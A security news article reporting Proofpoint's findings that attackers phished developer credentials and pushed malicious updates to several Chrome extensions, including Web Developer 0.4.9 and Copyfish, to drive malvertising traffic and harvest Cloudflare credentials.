Google Chrome Extensions on the Radar of Cybercriminals of late- Security Experts identify seven more extensions to be compromised.
Last month we reported that a Google Chrome extension Copyfish had been infected because the developer opened a phishing email using his Google account credentials. At that time we assumed it to be a mistake on the developer’s part and brushed off the likelihood of another such incident. However, we have been proven wrong since Proofpoint security researchers are claiming that at least seven more Chrome extensions are infected.
Researchers state that attacker got hold of Google Account credentials through phish scam and managed to compromise seven widely downloaded extensions, which has put so many users at risk of credentials theft and traffic hijacking.
In their blog post, Proofpoint researchers exposed the names of compromised Chrome extensions:
“We specifically examined the “Web Developer 0.4.9” extension compromise, but found evidence that “Chrometana 1.1.3”, “Infinity New Tab 3.12.3” , “CopyFish 2.8.5” , “Web Paint 1.2.1” , and “Social Fixer 20.1.1”  were modified using the same modus operandi by the same actor. We believe that the Chrome Extensions TouchVPN and Betternet VPN were also compromised in the same way at the end of June,” read the blog post.
This means cyber criminals and spammers are endlessly searching for novel ways to drive traffic to their partners’ programs and post malicious, unwanted ads on victims’ browsers. The attacks were noted at the end of July and at the beginning of August. After the hackers obtained developer’s credentials, they were able to publish “malicious versions of legitimate extensions,” stated Proofpoint researchers.
Just like the methodology adopted to infect Copyfish extension, cyber criminals deceived extension coders to give away Google Account credentials, which were used to access Google developer accounts. These accounts were linked to certain Chrome extensions; once access was established the hackers modified them with malicious code and compromised Google developer accounts.
“(The) malvertising chain that brings users from the fake alert to an affiliate site; we observed the compromised extension directing victims to two such affiliates, although others may also have been used,” revealed Proofpoint blog post.
The affiliate landing pages “browser-update[.]info, Browser-Update[.]info and searchtab[.]win” depicted substantial traffic; such as 920,000 visits were recorded for searchtab[.]win in a month. It, however, is not clear whether the entire traffic was generated through infected Chrome extensions or not.
On August 12th, developer Chris Pederick posted a tweet claiming that Chrome’s Web Developer extension has been compromised and a hacked version of 0.4.9 extension was being uploaded and distributed. It was this tweet that alerted Proofpoint researchers regarding latest extension hijacks. Proofpoint was able to retrieve the compromised version and detach the malicious code. An analysis of the coding revealed that attackers retrieved a remote file titled ga.js over HTTPS. The server’s domain was generated through domain generation algorithm.
“The code from this first step allows the threat actors to conditionally call additional scripts including some to harvest Cloudflare credentials,” researchers said.